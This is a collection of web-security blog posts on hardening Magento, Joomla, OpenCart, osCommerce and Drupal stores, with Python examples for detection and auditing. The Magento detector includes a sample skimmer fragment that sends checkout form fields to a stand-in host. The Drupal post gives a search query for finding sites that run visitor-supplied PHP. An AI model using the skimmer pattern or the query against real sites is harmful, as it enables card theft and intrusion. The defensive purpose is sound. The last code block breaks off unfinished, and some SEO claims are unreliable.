Website Protection – Security Blog
https://blog.siteguarding.com

10+1 Tips How to Improve the Security of Your Magento 2 Store
https://www.siteguarding.com/security-blog/101-tips-how-to-improve-the-security-of-your-magento-2-store/
Tue, 31 Oct 2017 05:48:11 +0000

Security is an issue that online merchants should never ignore, and Magento 2 stores are no exception to this rule. In this article, we will give you some useful tips on how to improve the security of your Magento 2 store. So, let’s start.

Update Your Magento 2 to the Latest Version

The Magento team regularly releases updates of its platform, adding new features and improving existing ones, in particular where security issues are concerned. So, check for the latest updates from time to time to provide your web store with the latest protection.

Use Reliable Magento 2 Extensions

Magento 2 extensions are popular because they enhance the basic functionality of the platform. However, before installing any extension, make sure that it is provided by a truly reliable developer, not a fraudster. In addition, it’s recommended to download Magento 2 extensions from trustworthy sources, such as the Magento Marketplace site.

Create Encrypted Connection

If data is transferred through an unencrypted connection, there is a risk that it can be intercepted. This problem can be prevented by configuring secure URLs right in your Magento 2 Admin Panel.

To perform the configuration, go to Stores > Configuration. In the Configuration menu, expand the Web option. In the panel that opens, find the Base URL (Secure) section and expand it. Here, you can configure the URLs to establish the encrypted connection.

Use Two-factor Authentication

As a rule, a secure Magento 2 password does not guarantee complete protection of your store from hacker attacks. Consider using two-factor authentication to further improve the security of your Magento 2 store and protect yourself from password-related risks that may appear in the future.

Create Backup Files

Make sure that you have a backup of all your web store files in case your store is hacked. Magento 2 lets you back up the entire database of your site, including the system and media files.

To perform the backup, in your Magento 2 Admin Panel, click on System and choose Backups in the Tools section. In the panel that opens, you can manage the backup process of your files. After the configuration is completed, apply the changes by clicking on the Save Config button.

Take Care of Your Email Address

Magento 2 automatically configures e-mail addresses through which users can easily recover their passwords. Still, if your email account is hacked, your Magento 2 store becomes exposed to hacker attacks. So, make sure that the email address given by Magento is not publicly known (change it if needed) and is protected with two-factor authentication.

Limit Admin Access

To ensure that the Admin Panel of your store can be accessed only from a particular IP address, restrict the admin access in your Magento 2 settings. First, click System in your Magento 2 Admin Panel and choose User Roles in the Permissions section. In the panel that opens, you can manage user roles in your store by clicking on the Add New Role button and assigning the corresponding roles to particular user IDs.

Enable Admin Login CAPTCHA

CAPTCHA is a technology that prevents hackers and even bots from accessing the database of your site. You can enable this technology in your Magento 2 Admin Panel.

First, click on Stores in the Admin Panel and choose Configuration in the Settings section. In the Configuration menu that opens, expand the Advanced section and choose Admin. On the page that opens, expand the CAPTCHA section. Here, you can enable the CAPTCHA feature for your web store and configure its settings. Don’t forget to save the configured settings by clicking on the Save Config button.

Configure Action Log

If you use Magento 2 Commerce Edition, you can track the store admin activity through the Action Log feature. To enable the feature, in your Magento 2 Admin Panel, open Stores and choose Configuration in the Settings section. In the menu that opens, expand the Advanced tab and choose Admin.

In the window that opens, expand the Admin Actions Logging section. Here, you can configure the Action Log settings. When the configuration is completed, save the changes.

Use Security Review Services

Magento security experts can give you useful recommendations on how to increase the protection of your store. Still, their tips do not always help to solve all the issues that you are dealing with. That’s why it’s recommended to use special services for analyzing web sites for potential security breaches at least once a year. By performing such checks, you can decide how the security of your store can be further improved.

Bonus Tip

The Magento 2 community, which is always ready to help you with any security issues you face, grows constantly. What’s more important is that community members regularly release security reports related to the latest versions of Magento 2. So, visit Magento Forums to provide yourself with the latest Magento 2 security information!

Conclusion

The protection of a web store from hacker attacks should be the number one priority for Magento 2 store owners. Use the tips given in the article to reinforce your site’s protection and leave no chance for hackers who may try to breach your security.

6 Tips How To Improve Magento Security
https://www.siteguarding.com/security-blog/6-tips-how-to-improve-magento-security/
Sat, 07 Oct 2017 21:34:51 +0000

While working with a Magento-based website you will be surprised by the number of built-in security features. But security is a vital point, and additional measures to make your website safer are worth taking. Let’s check what I suggest:

  1. Stay on top of Magento security updates. Magento developers work their socks off to provide merchants with a more powerful security system. They try to consider all possible risks and prevent them from happening. As a result, new Magento versions are packed with features and software to address detected security risks.
  2. Don’t be rash! Avoid simple passwords that include your date of birth and the like. Use random combinations of letters and digits and change them regularly. And don’t use the same or slightly similar passwords for multiple accounts. This is the best protection regardless of which CMS you use, even for accounts that are not related to your store.
  3. If you are the happy owner of a large business, you need more people involved in running the store. This considerably increases the risk of a break-in. It’s a mistake to give access to all administrative staff. It’s more reasonable for them to use different user accounts.
  4. In the ocean of Magento extensions, try to choose only well-vetted extension developers. It’s good to test something new. In general, experimenting is the best way to select the most suitable things. But remember that when security is at stake, it’s better to skip the experiments and choose well-tried products.
  5. You know that failures (equipment failure, staff mistakes, force majeure, etc.) kill business. In this light, you should always have a backup of your data. Ideally, keep more than a single backup and take backups of your website data regularly. This directly helps you restore your website in case of a security breach.
  6. Let two-factor authentication become a habit. A random password is good, but it doesn’t guarantee that experienced hackers will never discover even a well-made password. Sending a login code to a mobile device is a good and widespread practice. It protects your store from unauthorized logins.

What other measures may be taken to keep a website protected? I’m looking forward to your personal recommendations! See you soon!

Why Magento Security is Important
https://www.siteguarding.com/security-blog/why-magento-security-is-important/
Wed, 26 Jul 2017 11:13:54 +0000

The content management system Magento was developed in the US in 2007 by the well-known company Varien. The free CMS Magento is open-source software, developed on the basis of Zend Framework, and operates on a UNIX operating system. The CMS is primarily suitable for developing large online stores. There are already over 100,000 online resources running on this platform all over the world.

Opportunities and features of Magento

Based on a single Magento platform, you can instantly create several Internet resources and manage them at the same time, which is very convenient for administration. The catalog system is well structured, and goods can be compared. Free management of prices for goods, stock additions and gift certificates makes working with the system convenient both for the site administrator and for the buyer, who can choose goods at a discount and sort them according to certain characteristics.

Additionally, Magento offers good opportunities for search engine optimization: access to HTML code management; the ability to add meta tags (description and keywords) for each product or category; a customizable ending of the site address for each product; and Magento itself generates an XML sitemap for the search engines. Magento also provides a multicurrency and currency conversion system. This is a convenient function for customers, regardless of the country in which they are located.

If you want to run your online store on Magento without using templates, you will need knowledge of HTML markup and CSS styles. However, to work with this CMS, it is best to hire a specialist in this field.

In addition to the platform, free and paid modules are provided that expand the functions of the CMS. It is recommended to check all free modules on a test copy first, as many of them turn out to be low quality. For paid modules, free technical support from the developers is offered.

So, Magento CMS is a solid and high-quality platform, which is great for creating an online store. In some ways it can be difficult for an inexperienced user, but its capabilities are much wider than those of other similar platforms. And if a function is missing from the basic configuration, you can connect additional modules; at the moment there are more than four thousand different extensions.

Magento Security

The most popular recent way of exploiting a hacked Magento site is the installation of a spy script that tracks forms and sends the values entered into them to the hacker. This way the hacker gets access to the data of the bank cards with which customers pay for purchases in the store, as well as the personal data of the cardholder, that is, all the values the buyer enters when placing an order.

The script is loaded on any page of the store, but it is active only where sensitive data is entered. Usually, the addresses of these pages contain the fragments “onepage”, “checkout” or “onestep”; these are the ordering pages.
The script extracts data from the form fields (input, select, textarea, checkbox), builds a message from them and sends it to the attacker’s site via AJAX.
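
The traits described above (a test for checkout-page fragments in the URL, collection of input/select/textarea fields, and an AJAX send to another site) can be combined into a triage check over a store's JavaScript files. This is an added example, not code from the original article; the file names, the hosts shop.example, collector.example and psp.example, and the sample scripts are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Indicators taken from the article's description of the script.
CHECKOUT_FRAGMENTS = ("onepage", "checkout", "onestep")
FIELD_TAGS = ("input", "select", "textarea")

URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.I)
QUOTED_RE = re.compile(r"""(['"])(.*?)\1""")
PAGE_REF_RE = re.compile(r"\blocation\b|document\.URL")
SEND_RE = re.compile(r"\.ajax\s*\(|\.post\s*\(|XMLHttpRequest|\bfetch\s*\(|sendBeacon")


def external_hosts(js, store_host, allowed=()):
    """Hosts in absolute URLs that are neither the store nor allowlisted."""
    trusted = [store_host.lower()] + [h.lower() for h in allowed]
    found = set()
    for url in URL_RE.findall(js):
        host = (urlparse(url).hostname or "").lower()
        if host and not any(host == t or host.endswith("." + t) for t in trusted):
            found.add(host)
    return sorted(found)


def harvested_tags(js):
    """Form element names that appear inside string literals (selectors)."""
    tags = set()
    for _quote, literal in QUOTED_RE.findall(js):
        tags.update(t for t in FIELD_TAGS if re.search(r"\b%s\b" % t, literal))
    return sorted(tags)


def gated_fragments(js):
    """Checkout URL fragments named in a script that also inspects the page URL."""
    if not PAGE_REF_RE.search(js):
        return []
    return [f for f in CHECKOUT_FRAGMENTS if f in js.lower()]


def analyze(path, js, store_host, allowed=()):
    """Flag a script only when all four signals from the description coincide."""
    result = {
        "path": path,
        "page_gate": gated_fragments(js),
        "fields": harvested_tags(js),
        "sends": bool(SEND_RE.search(js)),
        "external": external_hosts(js, store_host, allowed),
    }
    result["suspicious"] = bool(
        result["page_gate"] and len(result["fields"]) >= 2
        and result["sends"] and result["external"]
    )
    return result


def scan(files, store_host, allowed=()):
    """Return the analysis of every suspicious script, ordered by path."""
    results = (analyze(p, js, store_host, allowed) for p, js in sorted(files.items()))
    return [r for r in results if r["suspicious"]]


# Constructed sample scripts (not taken from a real store or a real incident).
SAMPLES = {
    # Theme code: touches a form field but never looks at the URL or the network.
    "skin/js/slider.js":
        "jQuery('.slider input').on('change', function () { jQuery('#price').text(this.value); });",
    # The store's own checkout code: same traits, but it posts to the store itself.
    "js/checkout/opcheckout.js":
        "var els = document.querySelectorAll('#co-billing-form input, #co-billing-form select');\n"
        "if (location.href.indexOf('checkout/onepage') > -1) {\n"
        "  jQuery.ajax({url: 'https://shop.example/checkout/onepage/saveBilling', type: 'POST'});\n"
        "}",
    # Fragment with the traits the article describes, sending to a foreign host.
    "js/lib/stats.min.js":
        "if(/onepage|checkout|onestep/.test(location.href)){"
        "var f=document.querySelectorAll('input, select, textarea');"
        "/* field values collected here */"
        "jQuery.ajax({url:'https://collector.example/g.php',type:'POST'});}",
    # Legitimate payment integration: flagged until its host is allowlisted.
    "js/payment/psp.js":
        "if (location.pathname.indexOf('checkout') !== -1) {\n"
        "  var els = document.querySelectorAll('input, select');\n"
        "  fetch('https://pay.psp.example/tokenize', {method: 'POST'});\n"
        "}",
}

if __name__ == "__main__":
    for hit in scan(SAMPLES, "shop.example", allowed=("psp.example",)):
        print(hit["path"], "->", hit["external"], hit["page_gate"], hit["fields"])
```

Token matching of this kind misses obfuscated scripts, so a clean result does not replace comparing the deployed files against a known-good copy.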

To ensure Magento security, it is necessary to install the security patches issued by the manufacturer in a timely manner.

How to Harden Joomla Security
https://www.siteguarding.com/security-blog/how-to-harden-joomla-security/
Wed, 26 Jul 2017 09:42:18 +0000

A virus is a piece of software, and it does not reach a site out of thin air. It is brought to the site either through a hack or by the owner (administrator) of the site, who introduces it along with extensions and system templates. Let’s consider the 6 main points of “entry” of viruses on a site.

1. Hacking server hosting provider

Any hosting provider’s service is, in fact, a large computer that is also exposed to attacks and infections. Unfortunately, if your sites are located on a service that has been or is being attacked, you can react to this situation only after the fact, that is, by eliminating the consequences of the hack or attack.

Protection against hacking of the hosting provider’s service can only be preventative.

When choosing a hosting provider, choose only trusted, top-end services. Note whether the hosting provider uses its own data center or rents one. In reviews of the hosting provider, pay attention to the statistics on its downtime and unavailability of sites.

The “defenders” of sites have a first “golden” rule: for each domain (site), you need to create a separate user account. This is practically impossible on shared hosting (hosting where you are allowed to create 2-20 sites under the same account), but it is quite feasible on VDS servers. Such separation of sites by accounts isolates the sites from each other and, when one site is infected, prevents a similar infection of the other sites of the account.

2. Hacking the site through “holes” (CMS vulnerabilities)

Any content management system (CMS) eventually becomes vulnerable, and Joomla is no exception. That is why it’s important for Joomla security to monitor the system updates and periodically update it with new security releases.

3. Hacking CMS Joomla

The methods of hacking a CMS are as follows:

– Hacking the website and uploading shells and backdoors through various upload forms: photos, media files and other files;
– Introduction of malicious code through spam mailing or through SQL injection;
– Theft of site administrator data (SQL injection, XSS attacks, brute force);
– Website infection through third-party extensions and templates;
– Downloading extensions and templates from blogs and webmasters’ sites, even the most famous ones, is a direct path to possible infection of the site. Sometimes such chain downloading of an extension, from user to user, leads to mass infection;
– All kinds of “torrent” trackers offering a free download of a paid extension or template are not recommended either.

4. Hacking the Joomla site with a brute force attack

A brute-force attack is the guessing of the site administrator’s name and password. This loophole is closed by using complex administrator passwords and changing the administrator’s name from “admin” to another one.

5. Website hijacking through FTP interception

It is impossible to manage a site without FTP access to the site directory. The FTP protocol is quite accessible, and it would be strange if attackers did not try to use this loophole. To protect yourself from this loophole, you need to use the SFTP protocol, create a separate FTP account for each site and not store passwords in the FTP client.

6. Unprofessionalism of hired freelancers

If you do not work on the site yourself and hire freelancers to change the design or do other work, infection with virus code is possible.

How to Secure OpenCart CMS
https://www.siteguarding.com/security-blog/how-to-secure-opencart-cms/
Tue, 25 Jul 2017 11:13:25 +0000

OpenCart, like some other CMS, can be called a relatively secure platform. However, as with other content management systems, it is better to take care of the security of your site and its protection from hacking by unauthorized persons right away. In this article, we’ll give you basic tips that will help you improve the OpenCart security of your site. First of all, the article is suitable for those who have their own online stores built on OpenCart, but the tips are quite universal, so they will also be interesting to owners of sites on other CMS.

1. Hiding the login to the administrative panel

By default, the admin panel is usually entered at the following address: your_site/admin. Naturally, the more information hackers have, the easier it will be for them to hack your site. Therefore, the first recommendation is to change the login address of the admin panel from /admin to another one: /manager, /panel or something even more complicated.

How to do it: in the file manager or in phpMyAdmin, first, change the name of the folder “admin” to another one; second, make the same replacement in the “config.php” file inside the folder that you renamed; third, sometimes you also need to make changes to the “config.php” file in the root folder (check whether “admin” is mentioned there).

2. Change the administrator’s login and password

After changing the address of the panel, it is worth thinking about changing the login, which by default is also “admin”. It should be noted that this is generally the main login used on many CMS, so even if your store or site does not run on OpenCart, I still advise you to change it immediately.

How to do it: go to the admin panel, select “System”, then “Users” and again “Users”. Find the line with the login “admin”, go to its settings and change the login to another one.

By the way, you can change the password right there as well. I strongly recommend that you do this, creating a password no shorter than ten characters. If you cannot come up with one yourself, use one of the online services for generating passwords, which can easily be found in Google.

3. Change access rights for important files

Two files, namely config.php in the root folder and config.php in the folder that by default is called admin (whose name was changed above) contain important information associated with the database, so it is recommended to change the permissions for these files to “Reading Only”.

How to do it: you can change the rights with any tool that you use to work with files. The easiest way is to change them directly in the hosting control panel.
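
Steps 1 and 3 above can be verified after the fact with a short audit script. This is an added example, not code from the original article or from OpenCart; the folder name panel-7f3, the host shop.example, the /var/www/shop paths and the config.php contents are constructed, and read-only is assumed to mean that no write bit is set.

```python
import os
import re
import stat
import tempfile

DEFAULT_ADMIN = "admin"
# The default folder name used as a path segment, e.g. /admin/ or /admin'
ADMIN_SEGMENT = re.compile(r"/admin(?=[/'\"])")


def is_read_only(path):
    """True when no user, group or other write bit is set on the file."""
    return stat.S_IMODE(os.stat(path).st_mode) & 0o222 == 0


def stale_admin_lines(path):
    """Lines of a config.php that still point at the default /admin path."""
    with open(path, encoding="utf-8") as fh:
        return [line.strip() for line in fh if ADMIN_SEGMENT.search(line)]


def audit(root, admin_dir):
    """Check the renamed admin folder (step 1) and config.php permissions (step 3)."""
    findings = []
    if admin_dir == DEFAULT_ADMIN or os.path.isdir(os.path.join(root, DEFAULT_ADMIN)):
        findings.append("default admin folder still present")
    for rel in ("config.php", os.path.join(admin_dir, "config.php")):
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            findings.append(f"{rel}: missing")
            continue
        for line in stale_admin_lines(path):
            findings.append(f"{rel}: still references /admin: {line}")
        if not is_read_only(path):
            findings.append(f"{rel}: writable, expected read-only")
    return findings


def build_sample_store(root, admin_dir, fixed):
    """Create a constructed OpenCart-like tree; all paths and hosts are made up."""
    segment = admin_dir if fixed else DEFAULT_ADMIN
    os.makedirs(os.path.join(root, admin_dir))
    files = {
        "config.php": (
            "<?php\n"
            "define('HTTP_SERVER', 'https://shop.example/');\n"
            "define('DIR_APPLICATION', '/var/www/shop/catalog/');\n"
        ),
        os.path.join(admin_dir, "config.php"): (
            "<?php\n"
            f"define('HTTP_SERVER', 'https://shop.example/{segment}/');\n"
            f"define('DIR_APPLICATION', '/var/www/shop/{segment}/');\n"
        ),
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(path, 0o444 if fixed else 0o644)


def demo():
    """Audit a half-finished rename and a fully hardened store."""
    results = {}
    for label, fixed in (("half_done", False), ("hardened", True)):
        with tempfile.TemporaryDirectory() as root:
            build_sample_store(root, "panel-7f3", fixed)
            results[label] = audit(root, "panel-7f3")
    return results


if __name__ == "__main__":
    for label, findings in demo().items():
        print(label, findings or "OK")
```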

4. Disabling the display of errors

As a rule, when hacking websites, hackers use various loopholes, and the error messages displayed in response to wrong actions are often very helpful to them. Therefore, I recommend that you turn off the display of these errors.

Here you will most likely ask: what if you need to look at the errors? For that, you can use the error log file (its name is in the same block in the settings).

You can view it by going to the root folder of the site, then to system and then to logs.

How to do it: go to the admin panel, open “System”, then “Settings”, and in the settings open the “Server” tab. At the bottom there is the “Errors” block, where you should set “Show errors” to “No”.

How to Protect osCommerce CMS from Hackers
https://www.siteguarding.com/security-blog/how-to-protect-oscommerce-cms-from-hackers/
Tue, 25 Jul 2017 10:35:50 +0000

OsCommerce is one of the most popular content management systems for online stores. Its main advantages are a wide variety of modules and features that allow you to create a store of any complexity and any structure. However, it requires a certain professionalism.

OsCommerce is a free open source CMS that can be freely downloaded from the official portal of the system. The necessary modules and add-ons are available there as well. Help and support can always be obtained in the osCommerce community, whose participants, by the way, have contributed a significant number of additional features of the system.

So today we will talk about the osCommerce Security of the online stores and safe behavior on the Internet.

Hacking online store is dangerous for both sides – the shop owner and customers. From the hacked store, attackers steal confidential information: customer contacts, bank card numbers and other valuable information. Hackers can completely break the store. As a result, the seller loses reputation, and buyers – anonymity.

There are a lot of ways to protect your online store from hacking. In this article we will talk about the most accessible.

1. Encrypt the connection

Connect an SSL certificate to the server of your online store to enable a secure connection between the buyer’s browser and the store. This connection is almost impossible to hack. Therefore, an SSL connection is a must-have for any site that processes customers’ personal data.

2. Timely updates

Hackers are constantly finding new vulnerabilities in programs: operating system, browser, CMS. You need to quickly close these holes in security by updates.

3. Two-step authorization

Two-stage authorization is one of the most reliable ways to protect from hacking, so this authorization is used by Internet banks.

After entering the login and password, you receive a message on the phone with an access code. Login to the site is possible only by entering this code in a special field on the authorization page. Even if the attacker receives your password, he can’t enter the site without your mobile phone.

4. Using Password Managers

For osCommerce security, you need to use complex passwords, unique to each resource. In order not to keep all passwords in your head or on a piece of paper under the keyboard, use a password manager. A password manager will generate reliable passwords for you and store them. Access to the passwords in the manager can be obtained only with the help of a master password. So you just have to remember the master password.

5. Protect devices

All previous methods protect you against software hacking. But you can get a completely desperate attacker who will try to access your devices.

Imagine that an attacker has access to the computer from which you manage the site, and the browser is configured to auto-complete passwords. And now access is already in his hands.

To protect devices, set up encryption. The easiest way is to set the administrator password to log in to the computer and the lockscreen on the mobile device.

But it’s better to use advanced encryption. Different devices call for different methods.

These methods are just the tip of the security iceberg. So start using them now if you are not already using them.

How to Hack Website on Drupal CMS
https://www.siteguarding.com/security-blog/how-to-hack-website-on-drupal-cms/
Tue, 25 Jul 2017 10:23:28 +0000

Drupal is one of the most famous and popular open CMS written in PHP. The CMS itself is built with the right approach and with an eye to security guidelines. In its architecture Drupal is a very secure system, security fixes for the kernel and modules come out quickly, and hacking it through holes is not so easy.

Drupal is reliable in itself. Only the use of unverified modules, errors made by programmers creating their own modules for the site, server configuration errors or non-compliance with the foundations of Drupal security can be the reason for a hack.

By the way, the Drupal Security group very often issues security news with a critical level of vulnerability. Therefore, Drupal is safe only until a new version comes out, at which point the fixed vulnerability is revealed to all hackers. Sites on Drupal that are not updated immediately after the release of a security update often come under attack by hackers.

As with other CMS, most of the vulnerabilities come out of various plugins, themes and other custom functions. It is most convenient to have a tool that shows the versions of Drupal and its components. Knowing them, you can search for known vulnerabilities.

Usually, vulnerabilities are detected by bots – programs written by hackers to search for Internet sites on different CMS. Bots perform basic actions, for example, they try to register or to log in as admin with the password 11111, as well as other, more complex actions. If the site does have a vulnerability, the bot implants its program and sends information to the hacker’s database of broken sites; the attacker can then perform illegal actions if your site is profitable, for example, has high traffic.

But now we will talk about a vulnerability of another kind, namely the stupidity, oversights and carelessness of those web developers who give anonymous and other users access to the “PHP Code” input format. It allows any PHP code to be run without access to the site admin area. All instructions on Drupal security say to be careful with the built-in “PHP Code” module and not to grant access to it to strangers, let alone to unauthorized visitors. But, as we will see, these requirements are often neglected…

The all-powerful Google will help us search for vulnerable sites running on Drupal. Its search operators allow you to find sites by many very interesting parameters. We will look for indexed pages for editing materials where one (or the only) input filter is “PHP code”.

Search Algorithm:
1. The page URL must contain “node” and “edit”;
2. The page in the text should mention the phrase “You may post PHP code”.

The “inurl” operator, which allows us to find sites containing certain words in the URL, will help us in this, in our case this is “node” and “edit”.

A search for these criteria is performed by the line: inurl:node inurl:edit “You may post PHP code”

Next you will see a list of vulnerable sites running on Drupal. Obviously, many of them have already been used by spammers.

What can an attacker do with such a site? Upload a shell, spam the site, scan the server.

How to protect yourself from this? Disable the “PHP Code” module. If this cannot be done at all, then limit the rights to it to a minimum number of people, preferably only the chief administrator.

So avoid such nonsense, keep your kernel and modules up to date, and your site will be safe!

Ways to Avoid the Google Spam Filter
https://www.siteguarding.com/security-blog/ways-to-avoid-the-google-spam-filter/
Sat, 13 May 2017 10:46:46 +0000

Google’s infamous spam filter has weeded out a lot of junk on the internet, but it has also weeded out a lot of quality sites that were guilty of nothing more than improper SEO tactics.

Google Webmaster Tools does let you know when you have been flagged for certain errors, but it doesn’t necessarily let you know if you are being put through Google’s spam filter. Luckily, Google has given you plenty of tips for avoiding the spam, but it is up to you if you follow them or not.

Keyword Stuffing Should Never Be Used

You aren’t earning your website any good ranks or favors by stuffing keywords. Google has made it clear that if you stuff your meta descriptions, content and tags with keywords, you are going to be flagged by their spam filter. The same goes for using irrelevant keywords just to rank. Use relevant keywords at a healthy density — no more than five percent.

Don’t Commit Redirects

Usually redirects are going to get you in trouble. While some redirects are unavoidable, that will turn Google spam filters on to your site. Some things to avoid with redirects include:

  1. Using unnecessary redirects — especially if you are redirecting someone from the homepage that just showed up on the search engine results page.
  2. Using splash pages as a way to replace the homepage URL.
  3. Using expired domains that had high traffic in the past just to redirect users to your own irrelevant, poor quality content.

Avoid All Bad Linking Activities

While the use of links can be beneficial to your readers, such as directing them to a relevant blog post on your site for further reading, most links just get you into trouble with Google. Google has made it clear they want high quality, relevant linking practices on sites, so:

  1. Stop using “click here” or “read more here” as your anchor text for links. These types of phrases instantly turn on Google spam to your site.
  2. Don’t use any link farm practices or link exchanges — whether they are relevant or not.
  3. Don’t use unclear anchor text to direct readers to other sites — such as using unclear text to send them to your affiliate marketing page.
  4. Don’t buy or participate in link sponsorship programs of any kind.
  5. Don’t link to off topic sites.

Google spam could ruin your site’s rank if you’re not careful. By just following good SEO practices, you can avoid being tossed into the “spam” file. Even if you are considered spam, by taking the time to correct the errors you might be able to recover your site’s bad status.

Never Host Multiple Domains on One Hosting Account
https://www.siteguarding.com/security-blog/never-host-multiple-domains-on-one-hosting-account/
Tue, 14 Feb 2017 09:29:42 +0000

That’s my rule of thumb. If you want to know why, when there are exceptions, and how to best manage multiple domains, then you should read this article.

Hosting companies are quick to sell you on the idea of hosting multiple domains on a single account. And webmasters are quick to do the math: $10 per month for 5 websites is cheaper than 5 x $10 per month. Well, you should know that there is a danger in this kind of thinking.

The way multiple domains work is that they sit in separate folders within the root directory of your hosting account. And that means if a hacker gets into your account, they can access all of those folders. All your sites can be compromised at a single stroke. So all a hacker needs is access to just one of your websites.

If each domain is in a separate hosting account, you’ve isolated the individual sites. Assuming that you’ve got strong passwords on each account, that’s a lot of extra work for the hackers to do the damage they could do in a single account with multiple domains. This is why we at Siteguarding never keep multiple domains on the same hosting account. We always create a separate hosting account for each of your websites.

Some will argue that simply having good backups is enough and if your site gets hacked you can just restore all the domains with the backup. But most hacking isn’t about crashing sites – it’s about using sites to generate fake pages to scam search engines or to scrape data from your files and visitors or to send out spam emails. All of which can be happening without you knowing. Backups are only of use once you find out the hack has taken place, which may be long after the damage is done.

Others will argue that it’s easier to maintain multiple domains from a single account, but really, how often do you need to access your hosting account? Creating or deleting an email account is probably the most common use, and for most small businesses, that doesn’t happen very often. It may take a little extra time and organization to maintain separate hosting accounts, but again, it’s very little compared to the danger of exposing multiple sites to a single hack.

How to Protect Your Website From Hackers
https://www.siteguarding.com/security-blog/how-to-protect-your-website-from-hackers/
Wed, 26 Oct 2016 13:50:21 +0000

One of the biggest false beliefs circulated in the internet ownership and website security community is that “your site is not a big one, so there’s nothing worth being hacked for”. This particular belief has always led to dismay, because to the site owner’s surprise, he/she gets hacked and may lose everything. In fact, this popular belief may actually be propagated by hackers, because it creates laxity in web owners, keeping their guard down and making their defenses exploitable. The truth is that websites get hacked all the time; size and function do not matter at all.

The majority of security breaches are not necessarily attempts to steal your data or deface your website, but are devious attempts at turning your server into an email relay for spam or into a temporary web server, usually to serve illegal files. In this article we will try to give you some tips on how to protect your website from hackers. As terrible as this may seem, keeping these people at bay is very possible and all requirements for this are of extreme importance. There are a few fundamental actions you can take to keep your site out of sight of these website vandals and make sure it takes a lot of hard work for hackers to find your website.

Update Everything You Have

Whether you’ve created a DIY site on a third party turnkey platform or chose to build from scratch with your development team, as a site owner, you must make sure that every piece of software run by you is up to date. CMS providers like Joomla, Ilk and WordPress stay on constant guard, continuously scouring for holes to plug in their systems and hit the internet with regular patches and updates to ensure that their software is impervious to attacks. Make sure you run these updates and always have the most recent version supporting your site at all times.

If your site uses third-party plug-ins, you should stay updated with information about their updates and make sure all are implemented in a timely fashion. Lots of sites make the mistake of including plug-ins that fall into disuse with time. Ensure that you do regular cleanups and wipe out all unused, old and non-updated plug-ins; they pose the threat of being a gateway for hackers to exploit and wreck your site.

Reinforce Security Around Your Site

Just as you install antivirus on your desktop before browsing the web and securely lock your doors before leaving your house, you should also install a security system to be your site’s first line of defense against malicious attacks by hackers. This first line of defense is always a web application firewall. These are designed to inspect incoming traffic, identify and sift out malicious requests, protecting your website from SPAM, cross site scripting, brute force attacks and other high level threats. You can take a look at website antivirus we offer.

A few years ago, web application firewalls were solely hardware appliances, but quite recently a few providers of Security-As-a-Service (SecAaS) have begun to use cloud hosting technology to bring down the prices of security solutions. As a result, all website owners can now rent a cloud-based web application firewall without costly security appliances or even a dedicated hosting server. Better yet, you won’t need a course in website security or to hire security experts to utilize these services.

With a huge number of websites getting hacked every year, it has become obvious that hosting providers cannot efficiently handle all website security threats, and the rise of cloud-based web application firewalls is quickly filling this void.

HTTPS

Hyper Text Transfer Protocol Secure (HTTPS) is a secure communications protocol that transfers sensitive information between a web site and a web server. Moving your website to this protocol means adding an encryption layer, Transport Layer Security (TLS) or Secure Sockets Layer (SSL), to your HTTP, ensuring extra security from hackers for your data and your users’ data.

Although HTTPS is necessary for all online transactions, sites that run on HTTP outnumber HTTPS sites by hundreds to one. Currently, adding a secure protocol layer will not only guarantee security but also help search ranking, as Google has recently announced that HTTPS will be taken as a ranking factor.

Use Strong Passwords And Change Them Regularly

Brute force attacks work mainly by guessing username/password combinations. These have been reported to be on an alarming rise in the last two years, as thousands of attacks are detected every day across the web. Brute force and dictionary attacks can be effectively eliminated by using strong passwords. Strong passwords aren’t important only for email and financial transactions; they are doubly important for your website server, admin and database passwords.

What makes up a strong password? A strong password should be a combination of alphanumeric characters, upper and lower case letters and symbols and should be at least 12 characters long. A combination like this can prevent brute force attacks.

Passwords should also not be the same for all website logins. Change your passwords regularly to ensure breach-proof security and store users’ data in an encrypted form. This way, if your security is breached, there’s no way your attackers can steal your users’ information.
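The rules in this section (at least 12 characters, upper and lower case letters, digits and symbols, and no password shared between logins) can be checked automatically when credentials are set. The following Python sketch is an added example, not code from Siteguarding; the function names and the sample credentials are assumptions made for illustration.

```python
import string

MIN_LENGTH = 12  # minimum length stated in the article

# Character classes the article asks for.
CLASSES = {
    "upper-case letter": string.ascii_uppercase,
    "lower-case letter": string.ascii_lowercase,
    "digit": string.digits,
    "symbol": string.punctuation,
}


def check_password(password):
    """Return the list of rules from the article that this password breaks."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    for name, alphabet in CLASSES.items():
        if not any(ch in alphabet for ch in password):
            problems.append(f"no {name}")
    return problems


def audit_logins(logins):
    """Check each login (name -> password) and flag passwords that are reused."""
    findings = {name: check_password(pw) for name, pw in logins.items()}
    users_of = {}
    for name, pw in logins.items():
        users_of.setdefault(pw, []).append(name)
    for names in users_of.values():
        if len(names) > 1:
            for name in names:
                others = ", ".join(n for n in names if n != name)
                findings[name].append(f"same password as {others}")
    return findings


# Constructed sample credentials, for illustration only.
SAMPLE = {
    "server": "Tr4il-Mix&Lanterns",
    "admin": "Summer2016",
    "database": "Tr4il-Mix&Lanterns",
}

if __name__ == "__main__":
    for login, problems in audit_logins(SAMPLE).items():
        print(login, "OK" if not problems else problems)
```

Run the check at the moment a password is set, so that the plaintext never has to be kept anywhere for auditing.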

Conceal Your Admin Directories

One of the easiest ways hackers access your site’s data is by heading straight into your admin directories.

The scripts used by hackers scan directories on your web server looking for names like ‘admin’, ‘login’ or ‘access’, then focus all their energy on accessing these files to compromise your website security. Most popular CMSs give you total control over the names of your directories; a great idea would be to rename your admin folders. Pick names that make these folders inconspicuous and share them only with your webmasters. This method can greatly reduce the risk of a potential breach.
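Once the admin folder has been renamed, requests for the old well-known names show up in the access log as 403 or 404 responses, which makes the scanning described above easy to spot. The following Python sketch is an added example, not part of the original article; the log lines are constructed, and the threshold of three distinct paths and the folder name `/store-mgmt-7f3/` are assumptions.

```python
import re
from collections import defaultdict

# Directory names the article says scanning scripts look for.
PROBE_WORDS = ("admin", "login", "access")
THRESHOLD = 3  # assumption: distinct missing admin-like paths before flagging

# Common Log Format: ip ident user [time] "METHOD path PROTO" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
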